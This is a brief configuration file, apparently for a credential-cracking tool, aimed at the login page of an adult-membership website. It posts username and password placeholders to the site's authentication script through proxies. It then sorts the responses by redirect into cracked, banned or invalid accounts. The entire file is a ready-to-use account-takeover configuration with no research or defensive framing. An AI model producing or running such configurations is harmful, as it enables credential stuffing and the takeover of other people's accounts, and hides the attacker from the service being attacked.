[Details]
Title=Leche69
Author=Djlatino
Version=1.0.0
ConnectionCount=1
UseProxies=1
BannedString=Location: /?errcode=7
CrackedString=Location: http://miembros.leche69.com
InvalidString=Location: /?errcode=1
[Connection_1]
Host=login.leche69.com
URL=/auth.php
PostData=username=[user]&password=[pass]&savepassword=on&submit1.x=0&submit1.y=0
IsLogin=1
Method=1
ParseCount=0